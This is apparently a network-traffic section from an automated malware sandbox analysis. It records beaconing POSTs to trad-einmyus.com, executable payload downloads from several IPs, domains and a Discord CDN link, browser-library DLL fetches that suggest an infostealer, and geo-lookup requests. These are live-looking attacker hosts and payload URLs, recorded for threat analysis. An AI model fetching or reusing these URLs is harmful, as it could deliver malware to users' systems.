            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obuibmhfpgvomgod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukrvqlmerplrex.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tldcvhhvnmxh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ncehelngswfsf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amrbjqbtgpnr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lejcpsbnxtuxdtx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trlgbchacigdlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irythjvgtsstcpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwelovrvoirfrsd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvkfgvcftmyct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpkolefxkmrqfjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://duxgasiuxdjh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dejiweyxqsl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyqccrxyqqnpjdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thhfncmsprqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: trad-einmyus.com
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,10_2_0040CF10
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
            Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
            Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
            Source: global trafficHTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
            Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
            Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
            Source: global trafficHTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
            Source: global trafficHTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
            Source: global trafficHTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
            Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: E609.exe, 0000000F.00000003.2126413455.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
            Source: E609.exe, 0000000F.00000003.2127702492.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: trad-einmyus.com
            Source: global trafficDNS traffic detected: DNS query: sdfjhuz.com
            Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
            Source: global trafficDNS traffic detected: DNS query: cajgtus.com
            Source: global trafficDNS traffic detected: DNS query: www.safeautomationbd.com
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: nessotechbd.com
            Source: global trafficDNS traffic detected: DNS query: transfer.adttemp.com.br
            Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
            Source: global trafficDNS traffic detected: DNS query: api.msn.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Sat, 25 May 2024 19:29:44 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:29:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:30:24 GMTServer: Transfer.sh HTTP Server 1.0Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Served-By: Proudly served by DutchCodersContent-Length: 15Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:30:32 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=_hnx.RasMHd9rAKtQBpiugUN70R9RGSs0a3As8OUYhs-1716665432-1.0.1.1-LMEPxQarqfdvcfblA_as1y5sxEH7NpD4UFtDd9qLMmuZeJm.LuMhukMUSc4NN_d8ONEJPfSM15yZZ1hUjlei.Q; path=/; expires=Sat, 25-May-24 20:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dKLbD%2BiyBGP73Z6bVXwH%2FG%2Bkvxq4AAiW14%2B17Gxsui30bAluOyYJUaKH6oYX1Kk%2B8GVcwAawVDDol1JlKjRwOtU6Mk71NnR1SRRLlIZVKwhEypcR2qOzQXUpOmOBanOgPgThg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=pE84G.l23IqgyDRvhY6ciPU_hh1g3L9g.guRFnWtMhM-1716665432343-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8897f0c81c3478e2-EWRalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
